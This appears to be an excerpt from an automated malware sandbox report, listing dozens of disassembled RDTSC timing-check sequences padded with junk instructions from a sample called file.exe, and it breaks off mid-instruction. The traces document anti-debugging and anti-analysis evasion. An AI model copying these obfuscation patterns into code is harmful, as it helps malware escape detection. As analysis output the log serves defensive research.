Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FDD94 second address: 6FDDA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6C54B58548h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FDDA2 second address: 6FDDAC instructions: 0x00000000 rdtsc 0x00000002 js 00007F6C544CAC32h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FDDAC second address: 6FDDB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FDEF6 second address: 6FDF29 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F6C544CAC2Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007F6C544CAC34h 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edx 0x00000016 jc 00007F6C544CAC28h 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FDF29 second address: 6FDF2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FE046 second address: 6FE04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FE04C second address: 6FE063 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Bh 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FE063 second address: 6FE069 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6FE199 second address: 6FE19F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70145D second address: 701462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704135 second address: 70417A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F6C54B58548h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Bh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 push 00000004h 0x00000024 stc 0x00000025 mov edx, 1F5E95DCh 0x0000002a call 00007F6C54B58549h 0x0000002f js 00007F6C54B58554h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 70417A second address: 704180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 704180 second address: 7041C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F6C54B5854Ch 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 jnp 00007F6C54B5854Ch 0x00000016 pop ecx 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007F6C54B58557h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push ecx 0x00000025 pushad 0x00000026 popad 0x00000027 pop ecx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7041C7 second address: 7041CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 705ABC second address: 705AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 705AC0 second address: 705AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 705AC6 second address: 705AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F6C54B5855Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 705AEB second address: 705AF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 705AF2 second address: 705B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B5854Ch 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707A51 second address: 707A6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC38h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 707A6E second address: 707A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F6C54B58550h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707A8D second address: 707A97 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6C544CAC26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 707A97 second address: 707AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F6C54B58557h 0x0000000e jmp 00007F6C54B5854Ah 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11C42 second address: 4A11C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11C48 second address: 4A11C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11C4C second address: 4A11C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11C50 second address: 4A11CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6C54B58556h 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 mov ecx, 7FFD42FDh 0x00000015 call 00007F6C54B5854Ah 0x0000001a call 00007F6C54B58552h 0x0000001f pop eax 0x00000020 pop ebx 0x00000021 popad 0x00000022 call dword ptr [755D188Ch] 0x00000028 mov edi, edi 0x0000002a push ebp 0x0000002b mov ebp, esp 0x0000002d push ecx 0x0000002e mov ecx, dword ptr [7FFE0004h] 0x00000034 mov dword ptr [ebp-04h], ecx 0x00000037 cmp ecx, 01000000h 0x0000003d jc 00007F6C54B8A025h 0x00000043 mov eax, 7FFE0320h 0x00000048 mov eax, dword ptr [eax] 0x0000004a mul ecx 0x0000004c shrd eax, edx, 00000018h 0x00000050 mov esp, ebp 0x00000052 pop ebp 0x00000053 ret 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 mov cx, bx 0x0000005a call 00007F6C54B5854Fh 0x0000005f pop eax 0x00000060 popad 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11CB2 second address: 4A11B98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a jmp 00007F6C544CAC30h 0x0000000f ret 0x00000010 nop 0x00000011 xor esi, eax 0x00000013 lea eax, dword ptr [ebp-10h] 0x00000016 push eax 0x00000017 call 00007F6C58AD2FF4h 0x0000001c mov edi, edi 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F6C544CAC33h 0x00000026 pop ecx 0x00000027 pushfd 0x00000028 jmp 00007F6C544CAC39h 0x0000002d sub ecx, 7CAF1726h 0x00000033 jmp 00007F6C544CAC31h 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11B98 second address: 4A11B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11B9E second address: 4A11BE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ax, 7D61h 0x0000000e push ecx 0x0000000f mov cx, di 0x00000012 pop edx 0x00000013 popad 0x00000014 mov dword ptr [esp], ebp 0x00000017 jmp 00007F6C544CAC34h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6C544CAC37h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11BE4 second address: 4A11BF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 mov edi, esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11BF6 second address: 4A11BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11BFA second address: 4A11C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A119C9 second address: 4A119ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6C544CAC30h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A119ED second address: 4A119FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0C42 second address: 49B0C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C544CAC2Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0C52 second address: 49B0C83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F6C54B5854Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6C54B58557h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0C83 second address: 49B0C89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0759 second address: 49E0799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6C54B58551h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F6C54B5854Eh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov esi, edx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E0799 second address: 49E07CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d mov ax, E91Dh 0x00000011 push eax 0x00000012 mov dh, 57h 0x00000014 pop ecx 0x00000015 popad 0x00000016 push dword ptr [ebp+0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov esi, 3C0D9B89h 0x00000021 mov eax, 16AB6745h 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07CF second address: 49E07D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07D5 second address: 49E07D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07D9 second address: 49E07F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6C54B5854Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07F3 second address: 49E07F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49E07F9 second address: 49E0808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C54B5854Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C86 second address: 49C0C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0C8A second address: 49C0CA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58557h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0CA5 second address: 49C0D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6C544CAC2Fh 0x00000009 and cx, 7DEEh 0x0000000e jmp 00007F6C544CAC39h 0x00000013 popfd 0x00000014 mov eax, 7A4B1D77h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d jmp 00007F6C544CAC2Dh 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F6C544CAC2Eh 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0D04 second address: 49C0D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C0D08 second address: 49C0D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11755 second address: 4A11788 instructions: 0x00000000 rdtsc 0x00000002 mov ch, dl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F6C54B58550h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6C54B58557h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A11788 second address: 4A1178D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1178D second address: 4A117CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6C54B5854Ah 0x00000012 or ax, 48A8h 0x00000017 jmp 00007F6C54B5854Bh 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6C54B58556h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A117CD second address: 49B0C42 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6C544CAC32h 0x00000008 and esi, 3D8E7638h 0x0000000e jmp 00007F6C544CAC2Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 jmp dword ptr [755D155Ch] 0x0000001d mov edi, edi 0x0000001f push ebp 0x00000020 mov ebp, esp 0x00000022 mov ecx, dword ptr fs:[00000018h] 0x00000029 mov eax, dword ptr [ebp+08h] 0x0000002c mov dword ptr [ecx+34h], 00000000h 0x00000033 cmp eax, 40h 0x00000036 jnc 00007F6C544CAC2Dh 0x00000038 mov eax, dword ptr [ecx+eax*4+00000E10h] 0x0000003f pop ebp 0x00000040 retn 0004h 0x00000043 test eax, eax 0x00000045 je 00007F6C544CAC43h 0x00000047 mov eax, dword ptr [00459710h] 0x0000004c cmp eax, FFFFFFFFh 0x0000004f je 00007F6C544CAC39h 0x00000051 mov esi, 00401BB4h 0x00000056 push esi 0x00000057 call 00007F6C58A726C6h 0x0000005c mov edi, edi 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F6C544CAC2Dh 0x00000065 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0734 second address: 49A0751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58559h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0751 second address: 49A0782 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c jmp 00007F6C544CAC2Eh 0x00000011 sub eax, eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 movzx eax, bx 0x00000019 mov ecx, edx 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0782 second address: 49A07B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6C54B58557h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A07B0 second address: 49A081D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 98DAh 0x00000007 call 00007F6C544CAC2Bh 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 lock xadd dword ptr [ecx], eax 0x00000014 jmp 00007F6C544CAC2Fh 0x00000019 inc eax 0x0000001a jmp 00007F6C544CAC36h 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F6C544CAC2Dh 0x00000029 add cx, 2B66h 0x0000002e jmp 00007F6C544CAC31h 0x00000033 popfd 0x00000034 mov di, cx 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A081D second address: 49A0823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0823 second address: 49A0827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10010 second address: 4A1001F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1001F second address: 4A10084 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6C544CAC2Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movzx ecx, di 0x00000016 pushfd 0x00000017 jmp 00007F6C544CAC39h 0x0000001c sbb cx, 7E56h 0x00000021 jmp 00007F6C544CAC31h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10084 second address: 4A1008A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1008A second address: 4A10104 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov edx, eax 0x0000000f mov ax, 69A7h 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 call 00007F6C544CAC38h 0x0000001c pushfd 0x0000001d jmp 00007F6C544CAC32h 0x00000022 or si, 0D38h 0x00000027 jmp 00007F6C544CAC2Bh 0x0000002c popfd 0x0000002d pop ecx 0x0000002e push edx 0x0000002f mov di, si 0x00000032 pop esi 0x00000033 popad 0x00000034 mov eax, dword ptr fs:[00000030h] 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F6C544CAC2Ah 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10104 second address: 4A10152 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F6C54B58554h 0x00000013 sbb al, FFFFFFF8h 0x00000016 jmp 00007F6C54B5854Bh 0x0000001b popfd 0x0000001c mov edx, esi 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F6C54B58551h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10152 second address: 4A10180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6C544CAC2Ah 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F6C544CAC30h 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 mov bx, si 0x00000017 pushad 0x00000018 mov cx, 4EEFh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10180 second address: 4A101EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebx, dword ptr [eax+10h] 0x00000009 pushad 0x0000000a jmp 00007F6C54B5854Eh 0x0000000f mov ah, 07h 0x00000011 popad 0x00000012 push ebx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F6C54B58558h 0x0000001a xor cl, 00000078h 0x0000001d jmp 00007F6C54B5854Bh 0x00000022 popfd 0x00000023 call 00007F6C54B58558h 0x00000028 pushad 0x00000029 popad 0x0000002a pop ecx 0x0000002b popad 0x0000002c mov dword ptr [esp], esi 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 mov edx, 589937EEh 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A101EC second address: 4A10237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, 6508h 0x0000000a popad 0x0000000b mov esi, dword ptr [756006ECh] 0x00000011 jmp 00007F6C544CAC37h 0x00000016 test esi, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edi, 65BEB026h 0x00000020 call 00007F6C544CAC37h 0x00000025 pop esi 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10237 second address: 4A1028E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58556h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F6C54B594B6h 0x0000000f jmp 00007F6C54B58550h 0x00000014 xchg eax, edi 0x00000015 jmp 00007F6C54B58550h 0x0000001a push eax 0x0000001b jmp 00007F6C54B5854Bh 0x00000020 xchg eax, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov cl, bh 0x00000026 movzx esi, di 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1028E second address: 4A102A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6C544CAC35h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A102A7 second address: 4A1037F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [755D0B60h] 0x0000000e mov eax, 7696E5E0h 0x00000013 ret 0x00000014 jmp 00007F6C54B5854Dh 0x00000019 push 00000044h 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F6C54B5854Ch 0x00000022 and eax, 588A8348h 0x00000028 jmp 00007F6C54B5854Bh 0x0000002d popfd 0x0000002e call 00007F6C54B58558h 0x00000033 push ecx 0x00000034 pop edx 0x00000035 pop ecx 0x00000036 popad 0x00000037 pop edi 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F6C54B58553h 0x0000003f xor ecx, 4426E2EEh 0x00000045 jmp 00007F6C54B58559h 0x0000004a popfd 0x0000004b pushfd 0x0000004c jmp 00007F6C54B58550h 0x00000051 jmp 00007F6C54B58555h 0x00000056 popfd 0x00000057 popad 0x00000058 xchg eax, edi 0x00000059 jmp 00007F6C54B5854Eh 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 